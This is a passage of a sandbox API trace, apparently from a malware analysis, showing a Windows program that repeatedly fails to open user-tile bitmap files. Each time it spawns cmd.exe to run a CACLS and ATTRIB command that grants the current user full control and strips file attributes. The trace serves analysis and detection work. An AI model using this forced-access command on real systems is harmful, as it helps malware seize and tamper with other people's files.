hTemplateFile=0x0) returned 0xffffffff [0188.546] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", lpFilePart=0x12eab4*="usertile36.bmp") returned 0x52 [0188.546] GetLastError () returned 0x5 [0188.546] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0188.546] LocalFree (hMem=0x1c6cc8) returned 0x0 [0188.546] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0188.546] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0188.546] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.547] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0188.547] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0188.547] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0188.547] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9c8, dwThreadId=0x508)) returned 1 [0188.548] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] CloseHandle (hObject=0x1b4) returned 1 [0189.090] CloseHandle (hObject=0x120) returned 1 [0189.090] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] ReleaseMutex (hMutex=0xf8) returned 1 [0189.090] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] ReleaseMutex (hMutex=0xf8) returned 1 [0189.090] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] ReleaseMutex (hMutex=0xf8) returned 1 [0189.090] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.090] ReleaseMutex (hMutex=0xf8) returned 1 [0189.090] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.091] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile36.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", lpFilePart=0x12eab4*="usertile36.bmp") returned 0x52 [0189.091] GetLastError () returned 0x5 [0189.091] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0189.091] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.091] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.091] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.091] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.091] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.091] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.091] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.091] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0189.091] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.091] ReleaseMutex (hMutex=0xf8) returned 1 
[0189.091] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.091] ReleaseMutex (hMutex=0xf8) returned 1 [0189.091] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.091] ReleaseMutex (hMutex=0xf8) returned 1 [0189.091] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.091] ReleaseMutex (hMutex=0xf8) returned 1 [0189.091] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.092] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", lpFilePart=0x12eab4*="usertile37.bmp") returned 0x52 [0189.092] GetLastError () returned 0x5 [0189.092] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0189.092] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.092] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0189.092] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.092] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.092] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.092] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0189.092] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0189.092] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x114, dwThreadId=0x748)) returned 1 [0189.094] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] CloseHandle 
(hObject=0x1b4) returned 1 [0189.247] CloseHandle (hObject=0x120) returned 1 [0189.247] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] ReleaseMutex (hMutex=0xf8) returned 1 [0189.247] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] ReleaseMutex (hMutex=0xf8) returned 1 [0189.247] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] ReleaseMutex (hMutex=0xf8) returned 1 [0189.247] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.247] ReleaseMutex (hMutex=0xf8) returned 1 [0189.247] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.248] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", lpFilePart=0x12eab4*="usertile37.bmp") returned 0x52 [0189.248] GetLastError () returned 0x5 [0189.248] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0189.248] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.248] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0189.248] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.248] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.248] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.248] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.248] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.248] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0189.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.248] ReleaseMutex (hMutex=0xf8) returned 1 [0189.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.248] ReleaseMutex (hMutex=0xf8) returned 1 [0189.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.248] ReleaseMutex (hMutex=0xf8) returned 1 [0189.248] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.248] ReleaseMutex (hMutex=0xf8) returned 1 [0189.248] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0189.248] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", lpFilePart=0x12eab4*="usertile38.bmp") returned 0x52 [0189.249] GetLastError () returned 0x5 [0189.249] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0189.249] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.249] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.249] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.249] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.249] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.249] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0189.249] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0189.249] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9a8, dwThreadId=0x90)) returned 1 [0189.251] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] CloseHandle (hObject=0x1b4) returned 1 [0189.586] CloseHandle (hObject=0x120) returned 1 [0189.586] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] ReleaseMutex (hMutex=0xf8) returned 1 [0189.586] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] ReleaseMutex (hMutex=0xf8) returned 1 [0189.586] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] ReleaseMutex (hMutex=0xf8) returned 1 [0189.586] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.586] ReleaseMutex (hMutex=0xf8) returned 1 [0189.586] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.586] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile38.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", lpFilePart=0x12eab4*="usertile38.bmp") returned 0x52 [0189.587] GetLastError () returned 0x5 [0189.587] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0189.587] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.587] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.587] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.587] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.587] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.587] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.587] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.587] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0189.587] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.587] ReleaseMutex (hMutex=0xf8) returned 1 
[0189.587] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.587] ReleaseMutex (hMutex=0xf8) returned 1 [0189.587] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.587] ReleaseMutex (hMutex=0xf8) returned 1 [0189.587] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.587] ReleaseMutex (hMutex=0xf8) returned 1 [0189.587] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.588] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", lpFilePart=0x12eab4*="usertile39.bmp") returned 0x52 [0189.588] GetLastError () returned 0x5 [0189.588] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0189.588] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.588] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0189.588] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.588] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.588] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.588] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0189.588] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0189.589] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x5dc, dwThreadId=0x9d8)) returned 1 [0189.590] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] CloseHandle 
(hObject=0x1b4) returned 1 [0189.832] CloseHandle (hObject=0x120) returned 1 [0189.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] ReleaseMutex (hMutex=0xf8) returned 1 [0189.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] ReleaseMutex (hMutex=0xf8) returned 1 [0189.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] ReleaseMutex (hMutex=0xf8) returned 1 [0189.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.832] ReleaseMutex (hMutex=0xf8) returned 1 [0189.832] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0189.832] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", lpFilePart=0x12eab4*="usertile39.bmp") returned 0x52 [0189.832] GetLastError () returned 0x5 [0189.832] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0189.832] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.832] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
